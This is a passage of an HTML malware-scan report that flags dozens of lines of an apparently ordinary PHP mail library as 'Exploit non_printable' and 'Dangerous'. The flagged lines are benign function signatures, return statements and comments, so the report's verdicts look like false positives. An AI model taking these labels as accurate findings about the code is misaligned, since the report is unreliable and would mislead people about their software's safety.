</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2282</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2401</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2449</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2465</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2474</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2662</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2678</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2690</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2715</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2720</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2722</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2757</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2787</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
